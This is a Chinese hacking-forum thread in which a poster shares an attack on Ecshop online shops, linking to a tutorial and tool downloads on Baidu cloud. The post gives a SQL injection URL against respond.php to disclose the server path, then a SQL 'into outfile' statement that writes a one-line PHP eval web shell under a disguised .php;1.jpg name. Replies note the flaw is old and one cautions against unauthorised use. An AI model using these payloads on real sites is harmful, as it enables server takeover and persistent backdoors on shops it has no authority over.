Ecshop注入漏洞exp攻击

秋叶下的烟头

Ecshop注入漏洞
发个有用的帖子，防止删号呀！！
教程：http://pan.baidu.com/s/1eQnDp
软件工具下载连接：http://pan.baidu.com/share/link?shareid=338932&uk=2785594607
关于后台拿shell我写的不清楚。

大家可以先爆路径

[AppleScript] 查看源码 复制代码

/respond.php?code=cod&attach=voucher&sp_billno=1%20and%201=2

知道路径去后台sql查询

[AppleScript] 查看源码 复制代码

select "<?php @eval($_POST['pass']);?>" into outfile 'D:/webyifu/123.php;1.jpg';

能看懂把!!!

xyhacker

你这个漏洞是很久以前的了，去年就有了。

热心网友5

这类漏洞利用的分享还是有一定技术含量的，不过现在这种公开的注入方式大多已经被各种防护措施堵住了。提醒一下，用这类exp测试的话一定要注意法律边界，别在未授权的站点上操作。楼主的百度网盘链接不知道还有效没，想看看具体的原理。